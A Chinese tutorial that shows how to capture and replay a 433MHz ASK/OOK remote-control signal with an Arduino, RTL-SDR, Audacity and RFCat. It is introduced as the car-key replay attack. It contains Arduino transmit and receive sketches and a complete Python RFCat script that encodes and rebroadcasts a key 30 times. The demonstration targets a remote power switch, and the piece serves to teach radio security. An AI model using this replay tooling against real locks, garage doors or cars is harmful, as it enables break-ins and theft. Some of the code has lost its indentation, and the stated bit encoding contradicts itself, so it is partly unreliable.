使用Arduino模块实施无线信号的重放攻击

无线电已经存在使用了很长一段时间，在这很长的一段时间里诞生了一个名叫火腿族的集体（小编：嗯 对 就是整天吃火腿的那些人^_^  CQ CQ ）。无线电和互联网一样：同样存在一些安全隐患，比如：在无线信号的传输中并没有考虑到CRC校验、加密等安全问题。

小情景：如果你在某一天使用无线钥匙卡解锁汽车时候按第二次才成功解锁，那么你的汽车已经被黑客盯上了！

一种名为“车钥信号重放攻击”的新型攻击方式已经被国内外的一些黑客普遍使用：他们利用无线电技术来截获你的钥匙卡指令，然后对汽车电子钥匙的信号进行重放来入侵汽车、解锁车门。

感觉是不是很高大上呢？接下来我们将讨论：如何使用Arduino模块实施无线信号的重放攻击（实现重放一个不归零编码ASK/OOK调制的信号）。

433.925MHz频段在日常生活中很广泛使用：从无线门铃到车库遥控器都有它的“影子”。本文用来重放演示的设备是一个无线控制开关，这种设备在欧洲比较常见，它能够远程以无线的方式控制电器的开和关。

设备如下图所示：

总之，信号以不归零编码的方式从发送端传到接收端，随后接收端对信号进行解码并进行处理。不归零码是一种二进制码：‘1’代码正电压，‘0’代表负电压，脉冲的宽度越长代表数据量越大。下面是不归零码的一个示例：

我们使用Arduino Uno和很常见的RF模块以及RF模块的arduino库文件（ RC Switch）作为我们的示例。

所需材料

● RTL_SDR            亚马逊链接：http://www.amazon.com/NooElec-RTL-SDR-RTL2832U-Software-Packages/dp/B008S7AVTC （或者其他接收设备，USRP等）
● SDR-Sharp：        官网：http://sdrsharp.com（功能类似的其他软件还有：gqrx，HDSDR）
● Arduino Uno        网站：http://arduino.cc/en/Main/Buy
● 433MHz RF Link Set 网站：http://www.seeedstudio.com/depot/433Mhz-RF-link-kit-p-127.html
● 一些杜邦线,面包版
● RC-Switch 库       网站：https://code.google.com/p/rc-switch/
● Audacity           网站：http://audacity.sourceforge.net/download/
● RFCat              网站：https://bitbucket.org/atlas0fd00m/rfcat

步入正题

首先，我们先把Arduino和RF模块连接起来，并且把rc-switch库加入到arduino编译器并把程序下载到arduino中，下图是arduino和RF模块连接示意图。对我的无线433MHz发射模块来说，它有3个IO脚：GND，VCC和DATA。

模块的IO脚直接和Arduino IO脚相连接，其中RF模块的GND连接Arduino的GND，VCC连接Arduino的5V 管脚，DATA任意一个数字管脚。

当Arduino和无线模块物理连接正确以后，把下面的代码编译下载到Arduino中。

</*
  Simple example for sending

  http://code.google.com/p/rc-switch/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
  mySwitch.enableTransmit(2);  // Using Pin #2
}

void loop() {
  mySwitch.send("1100101"); // Send the message 0x65, in ASCII, ‘a’
  delay(1000);  // 1 second delay per transmission; 1000ms
}

现在Arduino已近正常工作了，我们通过RTL-SDR和SDRSharp去捕捉信号，考虑到通过无线模块产生信号不是很好的选择，无线模块的频率会随着时间改变，选择AM的调制方式：把SDRSharp频率范围设定在433-434MHz之间。

当我们找到无线模块发射的信号后，记录下来并保存为WAV的文件。用Audacity打开记录的WAV文件，如下图所示，，它是一个相当直接的信号，在没有源代码的情况下，我们假设信号是不归零码编码，脉冲宽度调制（PWM），且是ASK/OOK(幅移键控调制/开关监控-这意味着通过OOK控制开和关来表达数据的存在和不存在)，最后一件事我们需要计算信号的波特率，按照下面的步骤计算：

1.在工具的的底部设置长度，选择到信号的长度
2.获取音频的采样率（这里是62500hz）

计算波特率的公式：

1  / (samples / samplerate) → 1 / (22 / 62500) = ~2,840bps

大多数的情况，得到的波特率比较准确的，而且这个参数也是配置RFCat的一个重要参数。鉴于信号是脉宽调制的，我们需要把每个脉冲设定在合适的宽度。不幸的的是这需要反复实验和调试，幸运的是，AndrewMac提供了一个非常完美的脚本RFCat解决了这些问题， 通过RFCat软件，我们能够发射处理的信号并且能使Arduino很容易的接收这些信号，当使用RFCat的时候，我们需要设置一些参数：如下面所示：

d.setMdmModulation(MOD_ASK_OOK)
d.setFreq(frequency)
d.makePktFLEN(keyLen)
d.setMdmDRate(baudRate)
d.setMaxPower()
d.setMdmSyncMode(0)

首先我们设置调制方式为 ASK/OOK，设置我们的目标频率为 434042000Hz （433.925MHz），本质我们需要设置数据的长度，波特率为 2840bps, 确保发射为最大的功率，并且关闭同步，把同步模式设为0

假定我们对RFCat已经有了足够的了解并知道如何去使用，下面的脚本有助于我们执行上述的配置和PWM调节，这样有利于我们能接收到匹配的传输信号。

/*
Script by AndrewMac of andrewmohawk.com
*/

#!/usr/bin/env python

import sys
import time
from rflib import *
from struct import *
import argparse
import pprint
import bitstring

keyLen = 0
baudRate = (1 / 0.000350) #because the pulse width is 350 in the code
frequency = 434042000
repeatNum = 30

def ConfigureD(d):
d.setMdmModulation(MOD_ASK_OOK)
d.setFreq(frequency)
d.makePktFLEN(keyLen)
d.setMdmDRate(baudRate)
d.setMaxPower()
d.setMdmSyncMode(0)

print "[+] Radio Config:"
print " [-] ---------------------------------"
print " [-] MDMModulation: MOD_ASK_OOK"
print " [-] Frequency: ",frequency
print " [-] Packet Length:",keyLen
print " [-] Baud Rate:",baudRate
print "[-] ---------------------------------"

#raw what we are sending
bin_str_key = "1100101"; 

#adjust the key to make it longer so that the pulse width is correct
long_bin_key = "";

for k in bin_str_key:
x = "*"
if(k == "1"):
x = "11100" # <mossmann> A zero is encoded as a longer high pulse (high-high-low)
if(k == "0"):
x = "1000" #<mossmann> and a one is encoded as a shorter high pulse (high-low-low).
long_bin_key = long_bin_key + x

print "[+] Binary (PWM) key:\n\t",long_bin_key,"\n"

padAmount = len(long_bin_key) % 8
for x in range(0,8-padAmount):
long_bin_key = "0" + long_bin_key

print "[+] Binary Padded (PWM) key:\n\t",long_bin_key,"\n"

key_packed = bitstring.BitArray(bin=long_bin_key).tobytes()

keyLen = len(key_packed)

print "[+] Key len:\n\t",keyLen,"\n"
print "[+] Key:\n\t", key_packed.encode('hex'),"\n"
print ""

d = RfCat()
ConfigureD(d)

print "[%] Transmitting key: ",repeatNum," times\n"

#startString = "11101";
startStringBin = "000000000000000" + "1000100010001000111001000"
startkey_packed = bitstring.BitArray(bin=startStringBin).tobytes()
d.RFxmit(startkey_packed)

d.makePktFLEN(keyLen)
for i in range(0,repeatNum):
sys.stdout.write( "." )
d.RFxmit(key_packed)

#endString = "011";
d.RFxmit('\xFF')
sys.stdout.write("Done.\n")

解释一下上面的代码：

首先我们设置了调制的模式，波特率等，并且把这些配置写入到RFCat并使其生效
然后我们设定密钥key，也就是我们要发送的原始数据并把它赋值给变量binstrkey
然后我们改变密钥并认为‘1’表示111000，‘0’表示1000
这样我们原始的密钥（11001101）被定义新的二进制PWM 密钥即 11100111001000100011100100011100。

我们脉冲的宽度是精确的。下一个步骤就是将二进制PWM密钥转换成比特类型，这样数据就不以ASCII发送，然后用二进制PWM密钥的长度去配置d.makePktFLEN(keyLen)，这样RFCat在发送时就有固定长度的密钥，现在信息已近设置好了，我们还需要创建开始位和结束位以便Arduino知道我们数据什么时候开始发送和什么时候结束。当这些定义以后，我们执行RFxmit()函数，d.RFxmit(startkeypacked), d.RFxmit(keypacked), and d.RFxmit(‘\xFF’)，最后发送为：

00000000000000010001000100010001110010001110011100100010001110010001110011111111

这些信息被发送30次，并且发送10次被认为是一次完整的消息请求。然而，为了检查和确保信号正确的发送，修改repeatNum 等于‘1’，用SDRSharp重新录制并和原始信号比较，发现两者是相同的。

 Arduino的接收代码：

/*
  Simple example for receiving

  http://code.google.com/p/rc-switch/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
  Serial.begin(9600);
  mySwitch.enableReceive(0);  // Receiver on interrupt 0 => that is pin #2
}

void loop() {
  if (mySwitch.available()) {

int value = mySwitch.getReceivedValue();

if (value == 0) {
  Serial.print("Unknown encoding");
} else {
  Serial.print("Received ");
  Serial.print( mySwitch.getReceivedValue() );
  Serial.print(" / ");
  Serial.print( mySwitch.getReceivedBitlength() );
  Serial.print("bit ");
  Serial.print("Protocol: ");
  Serial.println( mySwitch.getReceivedProtocol() );
}

mySwitch.resetAvailable();
  }
}

此后，接收电路按照下图连接：

运气好的话，你的信号很快就会匹配成功，接收端收到RFCat发送的信号，那么你已经成功实现信号的重放。